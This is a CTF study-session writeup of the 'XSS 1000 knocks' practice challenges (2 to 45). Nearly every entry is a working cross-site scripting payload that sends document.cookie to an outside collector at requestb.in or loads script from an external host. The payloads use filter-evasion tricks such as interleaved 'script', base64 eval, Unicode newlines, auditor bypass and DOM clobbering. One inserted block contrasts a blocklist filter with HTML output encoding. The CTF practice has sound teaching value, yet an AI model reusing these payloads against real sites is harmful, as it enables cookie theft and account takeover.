katagaitaiCTF study session: xss千本ノック (XSS 1000 knocks) writeup
It was fun.
I'll try to solve all of them... I want to try...
2
Nothing special, just the payload.
q=%22%3E%3Cscript%3Elocation.href=%22https://requestb.in/x0u1ovx0?f3=%22%20%2B%20document.cookie%3C/script%3E
3
Nothing special, just the payload.
q=%22%3E%3Cscript%3Elocation.href=%22https://requestb.in/x0u1ovx0?f3=%22%20%2B%20document.cookie%3C/script%3E
4
Close the textarea.
q=</textarea><script>location.href='https://requestb.in/x0u1ovx0?f3='%20%2B%20document.cookie</script>
5
autofocus
q=%22%20 autofocus onfocus=%22location.href=%27https://requestb.in/x0u1ovx0?f5_=%27%20%2B%20document.cookie
6
Close with %27.
q=!%22%27%20 autofocus onfocus=location.href='https://requestb.in/x0u1ovx0?f6='%2Bdocument.cookie;//
7
autofocus
q=1%20autofocus%20onfocus=location.href=%27https://requestb.in/x0u1ovx0?f7=%27%2Bdocument.cookie;//
8
Set the iframe src to javascript:
q=javascript:location.href=%22https://requestb.in/x0u1ovx0?f8=%22%20%2B%20document.cookie
9
script tag.
q=%3Cscript%3Elocation.href=%22https://requestb.in/x0u1ovx0?f9=%22%20%2B%20document.cookie%3C/script%3E
10
"script" gets stripped, so write "script" many times over (interleaved, so that one deletion pass reassembles it).
q=%3Cscrscriptiscriptpscriptt%3Elocation.href=%22https://requestb.in/x0u1ovx0?f10=%22%20%2B%20document.cookie%3C/scrscriptiscriptpscriptt%3E
11,12
"script" gets stripped, so sandwich it inside onload.
q=%3Csvg%20oscriptnload=location.href=%27https://requestb.in/x0u1ovx0?f11=%27%2Bdocument.cookie%20%27%20%3E
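Challenges 10 to 12 all rest on the same filter design: a single pass that deletes the word "script" (or a similar token) and leaves everything else in place. The following is an added example, not code from the writeup or the challenge site, showing that filter beside context-aware HTML output encoding, checked against a constructed payload in the style of challenge 10 (the placeholder URL https://example.invalid/ stands in for the collector used on the page).

```javascript
// Added example, not from the writeup: a single-pass "delete the word script"
// filter (the kind challenges 10-12 get past) next to context-aware HTML
// encoding. Placeholder URL https://example.invalid/ stands in for the collector.

// Blocklist filter: deletes every non-overlapping "script" in one pass.
function stripScriptOnce(input) {
  return String(input).replace(/script/gi, "");
}

// Same filter looped until nothing changes. It closes this particular hole
// but still only knows one word; other tokens (onload, svg, ...) pass through.
function stripScriptRepeated(input) {
  let prev;
  let cur = String(input);
  do {
    prev = cur;
    cur = cur.replace(/script/gi, "");
  } while (cur !== prev);
  return cur;
}

// Output encoding for HTML text and quoted-attribute contexts: the characters
// that can change the parser's state become entities, so the markup is inert
// regardless of which words the input spells.
const HTML_ENTITIES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "`": "&#x60;",
};
function encodeHtml(input) {
  return String(input).replace(/[&<>"'`]/g, (ch) => HTML_ENTITIES[ch]);
}

// Rough check used by the assertions: does the string still open a tag?
function containsTagStart(s) {
  return /<\s*\/?[a-z]/i.test(s);
}

// Constructed sample in the style of challenge 10: "script" interleaved so
// that one deletion pass reassembles it.
const NESTED =
  "<scrscriptiscriptpscriptt>location.href='https://example.invalid/?c='+document.cookie</scrscriptiscriptpscriptt>";

// Summarise what each treatment leaves behind for a given input.
function compareTreatments(input) {
  return {
    once: stripScriptOnce(input),
    repeated: stripScriptRepeated(input),
    encoded: encodeHtml(input),
    onceOpensTag: containsTagStart(stripScriptOnce(input)),
    encodedOpensTag: containsTagStart(encodeHtml(input)),
  };
}

console.log(compareTreatments(NESTED));
```

The one-pass filter turns the sample back into a plain `<script>` element, while the encoded form contains no `<` at all; the difference is that encoding removes the parser's ability to switch state rather than trying to enumerate dangerous words.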
13
Close alert().
q=%27);location.href=%22https://requestb.in/x0u1ovx0?%22%2Bdocument.cookie;//
14
Create an external script and load it.
q=%3Cscript%20src=http://aviavi.ga/ajs%3E%3C/script%3E
15
Create an external script with an upper-case name and load it.
The HTTP://domain part (scheme and host) is case-insensitive, so it still connects.
q=%3Cscript%20src=http://aviavi.ga/AJS%3E%3C/script%3E
16
"." can't be used, so eval base64.
q=%3Cscript%3Eeval(atob('bG9jYXRpb24uaHJlZj0iaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9mMz0iICsgZG9jdW1lbnQuY29va2ll'))%3C/script%3E
17
"'" can't be used, so use backticks.
q=%3Cscript%3Eeval(atob(`bG9jYXRpb24uaHJlZj0iaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9mMz0iICsgZG9jdW1lbnQuY29va2ll`))%3C/script%3E
18,19
Use base64 (a data: URL) in the script tag.
q=%3C/script%3E%3Cscript%20src=%27data:text/html;base64,bG9jYXRpb24uaHJlZj0iaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9mMz0iK2RvY3VtZW50LmNvb2tpZQ==%27%3E%3C/script%3E
20
eval the hash from a script tag.
q=%3Csvg%20onload=eval(URL.slice(105))%3E#location["href"]="https://requestb.in/x0u1ovx0?f3="+document.cookie
21
eval the hash with svg onload; "." can't be used, so use location["href"].
q=%22%3E%3Cimg%3E//onload=eval(URL.slice(127));%20//a%20//src=/#location["href"]="https://requestb.in/x0u1ovx0?f3="+document.cookie
22,23
eval the hash.
q=%3Csvg%20//%20onload=eval(URL.slice(112))%3E//#location.href="https://requestb.in/x0u1ovx0?f3="+document.cookie
24
document is null, so use window.
q=location.href=%22https://requestb.in/x0u1ovx0?f3=%22%2Bwindow.document.cookie
25~28
window is null too, so use this or top.
q=location.href=%22https://requestb.in/x0u1ovx0?f3=%22%2Bthis.document.cookie
q=location.href=%22https://requestb.in/x0u1ovx0?f3=%22%2Btop.document.cookie
29
Leave the img tag unclosed so the rest of the page is read as its attributes.
q=aa%3C/p%3E%3Cp%3E%3Cimg%20%3Cimg%20%20%20src=%22https://requestb.in/x0u1ovx0?
30
Quotes and "." can't be used, so concatenate the hash character by character and push through.
q=location[`href`]=location[`hash`][1]%2Blocation[`hash`][2]%2Blocation[`hash`][3]%2Blocation[`hash`][4]%2Blocation[`hash`][5]%2Blocation[`hash`][6]%2Blocation[`hash`][7]%2Blocation[`hash`][8]%2Blocation[`hash`][9]%2Blocation[`hash`][10]%2Blocation[`hash`][11]%2Blocation[`hash`][12]%2Blocation[`hash`][13]%2Blocation[`hash`][14]%2Blocation[`hash`][15]%2Blocation[`hash`][16]%2Blocation[`hash`][17]%2Blocation[`hash`][18]%2Blocation[`hash`][19]%2Blocation[`hash`][20]%2Blocation[`hash`][21]%2Blocation[`hash`][22]%2Blocation[`hash`][23]%2Blocation[`hash`][24]%2Blocation[`hash`][25]%2Blocation[`hash`][26]%2Blocation[`hash`][27]%2Blocation[`hash`][28]%2B`?`%2Bdocument[`cookie`]#https://requestb.in/x0u1ovx0
31
Close document.write().
q=%27);location.href=%27https://requestb.in/x0u1ovx0?%27%2Bdocument.cookie;//
32
Put a backslash in the first parameter so the escaping prevents the string from being closed.
q1=\&q2=,location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie//
33
Use blink() to create a blink tag and put the svg inside it.
q=%22%3Csvg%20onload=location.href=%27https://requestb.in/x0u1ovx0?%27%2Bdocument.cookie;%3E%22.blink()
34
Overwrite type so the input is no longer hidden.
q=%22%20onfocus=location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie%20type=text%20autofocus%20a
35
Newline %0a
q=%0Alocation.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie
36
Newline %0A%0D
q=%0A%0Dlocation.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie
37
Newline %0A%0D%E2%80%A8
q=%0A%0D%E2%80%A8location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie
38
Newline %0A%0D%E2%80%A8%E2%E2%80%A8%80%A8
q=%0A%0D%E2%80%A8%E2%E2%80%A8%80%A8location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie
39
%E2%80%A8 gets stripped, so stuff in lots of them (interleaved, so one deletion leaves another).
q=%0A%0D%E2%80%A8%E2%E2%80%A8%80%A8location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie
40
Bypass the auditor with backticks.
q1=%3Cscript%3E`&q2=a`;location.href=`https://requestb.in/x0u1ovx0?`%2Bdocument.cookie;%3C/script%3E`
41
eval the hash.
q=%3Cscript%3Eeval(eval(location.href.substr(-92)))%3C/script#atob("bG9jYXRpb24uaHJlZj1gaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9gK2RvY3VtZW50LmNvb2tpZTs=")
42,43
eval base64.
q=%3Csvg%20onload=eval(atob(`bG9jYXRpb24uaHJlZj1gaHR0cHM6Ly9yZXF1ZXN0Yi5pbi94MHUxb3Z4MD9gK2RvY3VtZW50LmNvb2tpZTs=`))%3E
44
Everything was escaped, so at first it looked impossible.
& => & ' => ' " => " > => > < => < !$%[@:][{}*`+}()~=`$
It was a PHP problem.
The form URL uses $_SERVER['PHP_SELF'].
Combine that with DOM clobbering to overwrite document.body.
~~.knock.xss.moe//index.php/%22%20name=body%20%3E%3Cinput%20value=%22?q=%3Csvg%20onload=eval(atob(`bG9jYXRpb24uaHJlZj1gaHR0cHM6Ly9yZXF1ZXN0Yi5pbi9waHdxNWRwaD9gK2RvY3VtZW50LmNvb2tpZTs=`))%3E
45
No luck.